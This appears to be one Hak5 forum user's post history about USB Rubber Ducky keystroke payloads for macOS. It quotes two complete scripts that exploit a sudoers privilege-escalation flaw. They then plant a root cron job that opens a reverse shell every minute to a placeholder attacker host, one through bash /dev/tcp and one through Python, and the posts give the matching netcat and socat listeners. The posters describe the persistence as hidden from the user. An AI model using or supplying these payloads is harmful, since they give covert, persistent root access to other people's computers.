V3sth4cks153
-
Posts
57 -
Joined
-
Last visited
Posts posted by V3sth4cks153
-
-
Hi.
I think that's what you're looking for: https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/
This payload uses crontab, but it works just as good !
The only problem is that it relies on a privilege escalation vulnerability in OSX Yosemite, which has been patched in OS X 10.10.5, and as far as I'm aware, it's only been tested on Yosemite.
I hope this solves your issue !
V3sth4cks153
-
Sad news :'-(
Yeah ! But there still are people who won't update before a long time ! So it's still relevant...
-
I've managed to solve this by adding a few delays, but the main fix was adding a space after setting the volume since in some languages or settings, the apostrof isn't automatically set, only when a character or space is followed by it.
So here is my adaptation, probably smaller delays would still work:
DELAY 1000 GUI SPACE DELAY 2000 STRING terminal DELAY 500 ENTER DELAY 1000 STRING osascript -e 'set volume 7' DELAY 500 SPACE DELAY 500 ENTER DELAY 500 STRING open
DELAY 500 ENTERGreat ! I'm glad you found a solution to your problem !
-
The vunerability has been patched in 10.10.5 !
-
The vulnerability has been patched in 10.10.5 !
-
my problem solved thanks.
You're welcome !
-
Any idea???
If I'm not mistaken, this means the Ducky is unable to read the sd card... Do you have another one to try and see if it works ?
I hope this help you,
V3sth4cks153
-
I really need help on this one... Anyone ?
-
Nice! Let me know how it went :)
I tried the first payload, which uses the bash reverse shell, and it worked without any problem on my mac ! I'll try it on other macs tomorrow, and let you know how this goes...
However, when trying to use the second one, which uses python, I was blocked because it uses some backslashes... I tried modifying the keyboard properties, but as I just posted here: https://forums.hak5.org/index.php?/topic/36433-multiple-modifier-keys-in-keyboard-layout/, I can't get it to work... Do you know how to use more than one modifier key in the properties file ?
-
Hi.
I've been trying to modify the Swiss german keyboard properties file for use with my Swiss french Mac Book Pro, and so far I've managed to make everything work, besides the backslash ( "\" ) key, because it requires both the ALT and SHIFT modifier keys, and it looks like the encoder doesn't support multiple modifier keys in keyboard properties.
I came across this thread which talked about recompiling the encoder, which I don't have a clue how to do...
Does anyone have an idea how to solve this problem ?
Thanks,
V3sth4cks153
-
Good news!!
I've searching around and I found that «netcat does a terrible job emulating a tty», so as I stated before, arrows and key combinations don't work as expected.
Then I found a way better alternative to the payload that uses python to create the reverse shell and socat instead of netcat to listen for the connection.
This is the Ducky payload:
DELAY 2000 REM --------------- OPEN TERMINAL IN A NEW WINDOW --------------- COMMAND SPACE DELAY 200 STRING Terminal DELAY 200 ENTER DELAY 500 COMMAND n DELAY 300 REM --------------- ESCALATE PRIVILEGES --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER DELAY 100 REM --------------- RUN PAYLOAD --------------- STRING (crontab -l; echo "* * * * * python -c \"import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')\" evilcorp.com 443") | crontab - ENTER DELAY 100 REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 100 REM --------------- CLOSE TERMINAL --------------- STRING exit ENTER DELAY 100 COMMAND w DELAY 100 COMMAND qAnd in your server, to listen for the connection you have to run:sudo socat `tty`,raw,echo=0 tcp-listen:443
NOTE: Mostly sure you don't have socat installed, but you can do it very easily via apt-get (if your server is Debian based Linux. I'm not sure if it's available in OS X via homebrew).This method has a longer command to execute and is not as «elegant» as the previous, but it solves ALL of the problems, and when I say all, I mean that even the autocomplete with the TAB key works perfectly. It's just the same behaviour than an SSH connection. You can also press «Ctrl + C» and you won't drop the connection, it's going to send that command to the victim as expected :)
To exit, just press «Ctrl + D».
Same as before, it will try to reconnect every 60 seconds.
I hope this helps. I've tested it an works like a charm.
That's so cool ! Really well done ! I'll test it first thing tomorrow !
-
I think this might be a delay issue... Try adding more delay at the beginning of the script (something like "DELAY 5000" should be fine), and also increasing the delays between each command.So I have tried the following:
- online encoder
- default duckyencode
- duckyencoder from midnitesnake
All with this payload to begin with: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---osx-youtube-blaster
Sometimes the spotlight is not opened correctly, but always ENTER presses are not set right. If it opens terminal, string for volume is put in, but no enter pressed. Then string open youtube is put in, and then ENTER is pressed but of course it can't open it since the command is wrong (two commands in one line).
Who can help me get over this noobishness?
I hope this helps you !
V3sth4cks153.
-
To disable it you just should run:
sudo crontab -e
In the victim's computer. This will open a text editor and you just have to remove only the last line which is the one that the script created. Then save and you're done.Ok great ! Thanks ! I'll give me feedback as soon as I get a chance to test it.
-
Oh ! I understand ! So it's not a question of being more discrete then...Thanks!
The code I saw uses the .plist files to start the connection on reboot and repeat the execution of the script each 60 seconds, but I just find it way easier to do with crontab.
Yes, this makes it difficult to find, specially because it adds the cron task to root's crontab, so even if the user takes a look at his own cron list, he will see nothing (unless he is root) :)
Regarding the arrows: The problem is not with the payload (it works as intended :). The problem is with netcat once it's connected and I gain control manually (no longer using the ducky).
When the victim makes the connection to my server, from my terminal I can't edit his files using VIM or nano since when I open any file, I can't use the arrows to move around (weird symbols appear instead).
Same happens when I want to «borrow» a file from the victim. When I try to connect via FTP from his machine to my server, I write:
ftp myserver.com
And instead of asking for the username / password, the terminal goes blank and does not respond anymore, as if the connection was lost.Maybe it's a netcat limitation to send some output and special keys (as the arrows) through the connection?
Do you know any way around this? I know setting an SSH server in the victim would be the best solution, but then the port 22 should be open in his router and pointing to his IP address...
I'm not sure if I'm making myself clear. I'm sorry, english is not my native language :)
Thanks!
For your problem with the arrow keys, I think it might be a NetCat issue, but I really don't know how to get around it...
Don't worry, you're making yourself perfectly clear. At least for me even if English is not my native language as well ! :)
-
Hope it works for you :)
I've tested in a couple of Macs by now, and everything works as expected.
I hope so ! It would be so cool ! But is there a way to disable it though ? If so, could you give me the command please ? Thanks
-
Hi! I'm new to the Rubber Ducky and to this community.
I've made a simple payload to create a reverse bash in an OS X target by using crontab.
I've seen some examples that use complicated generated plist files, and I'm not sure about what the advantage is over setting a cron to recover the session.
Anyway, this is my payload:
DELAY 2000 REM --------------- OPEN TERMINAL IN A NEW WINDOW --------------- COMMAND SPACE DELAY 300 STRING Terminal DELAY 300 ENTER DELAY 700 COMMAND n DELAY 500 REM --------------- ESCALATE PRIVILEGES --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER DELAY 200 REM --------------- RUN PAYLOAD --------------- STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab - ENTER DELAY 200 REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 200 REM --------------- CLOSE TERMINAL --------------- STRING exit ENTER COMMAND Q
What this does is:- Open the terminal
- Magically grant sudo privileges (many thanks to V3sth4cks153 for this)
- Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP)
- Remove the newly added privileges to the current user in /etc/sudoers
- Close the terminal app
So now, all we have to do in our attacking machine is:
sudo nc -l -p 443
We wait one minute (max) and we're in with root privileges
Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it.
Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want.
I just tested it on my girlfriend's Macbook Air and it works flawlessly.
One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi, or something like that, I can't. Maybe you guys can point me to some solution to this?
Same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to re-connect.
Hope you like it!
Hi ! That looks really good ! I think that maybe the scripts you saw use plists for hiding purposes ? But even using crontab I think is covert enough for the average Mac user not to notice it.
The problem you have may be caused by the encoding of your payload... I had some problems with language properties... For example, encoding a payload with the Swiss layout sometimes caused some special characters (<, >, and some other ones) to be swapped, but it never happened with the arrow keys. What keyboard layout are you using ?
-
This vulnerability is great!
I've just created a payload for a persistent reverse bash in OS X using it:
https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/
About visudo:
I've been testing a little, and it seems that nothing happens if you directly edit «/etc/sudoers», so what my script does is, once the payload was executed, just delete the last line of the file like this:
REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------STRING echo -e '$d\nw\nq'| ed /etc/sudoersENTERDELAY 200
I tested this in my own Mac and it works ok. It's way simpler and faster than using visudo.Hope it helps!
Hi. That's really cool !
It's even better than the ":$d" command in visudo ! Being a bit of a bash beginner, I didn't even think about not opening the file in the first place... I'll test it on my computer when I'm back home from holidays.
-
You're welcome !thanks.
-
This looks fun. I have a few questions though, so say I want to execute this on my own machine.... Do I just plug in the Duck and it starts Quacking away? Also, do you have a repo of all of these ducky scripts available? If so do you mind if I make a few? You have some pretty bad ass work on this forum. :)
Thanks ! I'm glad you like it ! To answer your first question, it should work right away. Since the script makes the computer download an image from the Internet, all you need is an Internet connection, without any prework. I have a GitHub Repo of all the Rubber Ducky scripts I've made. You can find it right here: https://github.com/V3sth4cks153/USB-Rubber-Ducky-Scripts
Of course if you want to contribute to it, feel free to do so !
-
Thanks! I tried last night to make my own but with no success. I will give this a run!
You're welcome ! Tell us if it works ! I didn't test it on my side...
-
This just made me want to make a DuckSlurp script for Mac OS X ! Here it is : https://forums.hak5.org/index.php?/topic/36324-payload-os-x-duckslurp/
EDIT:
In the worksI found that it's already been done ! Here: https://forums.hak5....ackground-asap/I may try to improve it a bit but only if I get the time.
-
I just stumbled upon this topic, which made me want to make a similar script, but for Mac OS X, since I couldn't find any.
EDIT:
In the worksI found that it's already been done ! Here: https://forums.hak5.org/index.php?/topic/34697-payload-osx-run-duckslurp-shell-in-the-background-asap/I may try to improve it a bit but only if I get the time.
-
thanks,nowhow do i use it?
like how do i put that into the duck?
also, do i need to edit the VIDPID.txt? if so then what do i type in VIDPID.txt?
If I'm not mistaken, you have to take the microSD card out of the Ducky, and read it with an adapter on your computer. Then, put both the VID_PID_SWAPPER.exe and VIDPID.txt on the microSD card, and run the VID_PID_SWAPPER.exe. Basically what happens is the VID_PID_SWAPPER.exe pics a random VID/PID combination from the VIDPID.txt file, which is loaded with about 350 different combinations (so, no, you don't have to edit it). Once you run the exe, a VIDPID.bin file should be created on the microSD card, and that's what tells the Ducky what VID and PID to use.
Remember to run the EXE ON the microSD card, or else it won't do anything !
V3sth4cks153
-
how do i use the VID_PID_SWAPPER in windows
and does anyone have a link to the compiled exe file?
I think that's what you're looking for: https://github.com/midnitesnake/USB-Rubber-Ducky/tree/master/Firmware/Utils/VID_PID_SWAPPER_1.1
I hope this helps you !
V3sth4cks153
Config Rubber Ducky on MAC OS
in Classic USB Rubber Ducky
Posted
Hi,
No, you don't need to: the script will work on the stock firmware, as it is fully self contained.
Regards,
V3sth4cks153